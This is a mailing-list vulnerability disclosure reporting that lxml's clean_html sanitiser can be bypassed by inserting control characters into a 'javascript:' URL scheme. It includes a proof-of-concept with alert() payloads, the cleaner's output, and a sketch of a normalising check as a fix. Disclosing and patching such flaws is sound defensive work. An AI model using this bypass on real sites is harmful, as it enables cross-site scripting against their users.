[lxml] lxml.html.clean vulnerability

Максим Кочкин maxxarts at gmail.com
Tue Apr 15 18:33:49 UTC 2014


Hi, guys.

I've accidentally found a vulnerability in the clean_html function. A user can
break up the URL scheme with non-printable characters (\x01-\x08), and the
javascript: URL then gets past the cleaner. Here is a PoC.


from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print(clean_html(html))


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>


I'm not a Python programmer, so I can't give you a quick fix. I found it by
black-box testing a site that uses lxml. I'm not sure whether it's a bug or
whether I just got things wrong.
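
Not a real fix, but to illustrate the idea, here is a rough sketch. It assumes
the check should ignore control characters and whitespace when it looks at the
URL scheme. looks_like_script_url and the list of schemes are made up for this
example; they are not anything in lxml.

```python
import re

# Hypothetical helper, not part of lxml: match ASCII control characters
# (\x00-\x1f, \x7f) and the space character so they can be dropped before
# the scheme is inspected.
_CONTROL_OR_SPACE = re.compile(r'[\x00-\x20\x7f]+')


def looks_like_script_url(url):
    """Return True if the URL starts with a script scheme once control
    characters and whitespace have been removed."""
    normalized = _CONTROL_OR_SPACE.sub('', url).lower()
    return normalized.startswith(('javascript:', 'vbscript:'))


# Same URLs as in the PoC above: \x01 through \x09 inserted into the scheme.
for code in range(1, 10):
    url = 'javas%script:alert(1)' % chr(code)
    print(repr(url), looks_like_script_url(url))
```

With this check every URL from the PoC is reported as a script URL, while an
ordinary http:// link is not.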

----
ksimka (@m_ksimka)